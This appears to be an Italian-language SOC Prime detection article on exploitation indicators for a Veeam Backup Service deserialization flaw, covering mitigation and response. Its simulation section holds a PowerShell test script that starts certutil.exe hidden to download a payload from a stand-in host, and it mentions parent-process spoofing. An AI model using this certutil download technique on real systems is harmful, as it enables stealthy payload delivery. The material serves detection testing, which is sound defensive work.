SOC Prime Bias: Critico

10 Jul 2026 18:16 UTC

CVE-2026-44963: Indicatori di Sfruttamento del Servizio di Backup Veeam

Author Photo
SOC Prime Team linkedin icon Segui
CVE-2026-44963: Indicatori di Sfruttamento del Servizio di Backup Veeam
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Questo rapporto delinea gli indicatori di compromissione associati a CVE-2026-44963, una vulnerabilità in Veeam Backup Service che può consentire l’esecuzione di codice remoto tramite deserializzazione insicura. Gli attaccanti possono abusare della falla per avviare processi figlio sospetti dal servizio Veeam. L’attività risultante può portare ad accessi non autorizzati e creare opportunità per spostamenti laterali attraverso la rete.

Indagine

L’indagine si concentra sul rilevamento di processi figlio sospetti generati da Veeam.Backup.Service.exe, inclusi strumenti come cmd.exe or powershell.exe, e sull’identificazione di attività di rete insolite sulle porte correlate a Veeam. Gli analisti dovrebbero inoltre monitorare eventi di accesso non autorizzati e cambiamenti inattesi di file all’interno delle directory di Veeam.

Mitigazione

Per ridurre il rischio, gli amministratori dovrebbero aggiornare Veeam Backup & Replication a una versione che risolva il difetto di deserializzazione insicura. Le politiche del firewall dovrebbero limitare rigorosamente l’accesso alle porte Veeam 9392-9419, e i difensori dovrebbero monitorare l’autenticazione a questi servizi da parte di utenti di dominio non amministratori. Gli account dei servizi dovrebbero essere inoltre limitati secondo i principi di minimo privilegio.

Risposta

Se viene rilevata un’attività sospetta, il server Veeam interessato dovrebbe essere isolato immediatamente dalla rete. Gli investigatori dovrebbero esaminare i log di esecuzione dei processi, inclusi Event ID 4688 e la telemetria di Sysmon, insieme ai record delle connessioni di rete per determinare l’entità della compromissione. Dovrebbe essere condotta un’auditing delle attività recenti dell’account, e le credenziali dovrebbero essere reimpostate per qualsiasi account coinvolto durante l’intervallo di intrusione sospetto.

Flusso di Attacco

Esecuzione simulazione

Prerequisito: il controllo pre-volo Telemetry & Baseline deve essere passato.

Motivazione: Questa sezione dettaglia la precisa esecuzione della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente le TTP identificate e mirano a generare esattamente la telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrazione & Comandi d’attacco: L’avversario sfrutta una vulnerabilità nel Veeam Backup Service (simulato) per ottenere privilegi di esecuzione. Per mantenere un profilo basso durante il download di un payload di seconda fase, l’attaccante utilizza il processo Veeam compromesso per generare certutil.exe, un comune binario Living-off-the-Land, per recuperare un file remoto. Questa azione è intesa a attivare la logica della regola di rilevamento process_creation .

  • Script di test di regressione:

    # INIZIO SIMULAZIONE: Questo script simula il servizio Veeam che genera un processo sospetto.
    # Nota: Poiché non possiamo facilmente 'diventare' il servizio Veeam senza diritti di amministratore/sistema, 
    # simuleremo la telemetria creando un processo fittizio che imita il percorso ParentImage.
    
    $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe"
    $TargetBinary = "certutil.exe"
    
    Write-Host "[+] Simulazione di processo figlio sospetto da $VeeamPath" -ForegroundColor Cyan
    
    # In un ambiente reale, la vulnerabilità causerebbe la chiamata del servizio a questo.
    # Per la convalida, attiviamo il processo. Per corrispondere strettamente al requisito 'ParentImage' della regola Sigma in un laboratorio,
    # il tester dovrebbe rinominare manualmente un processo o utilizzare uno strumento per falsificare l'ID del processo genitore (PPID) se testa uno specifico EDR.
    
    Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden
    
    Write-Host "[+] Comando di simulazione eseguito." -ForegroundColor Green
  • Comandi di pulizia:

    # Rimuovere eventuali file temporanei creati dalla simulazione
    Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue
    Stop-Process -Name "certutil" -ErrorAction SilentlyContinue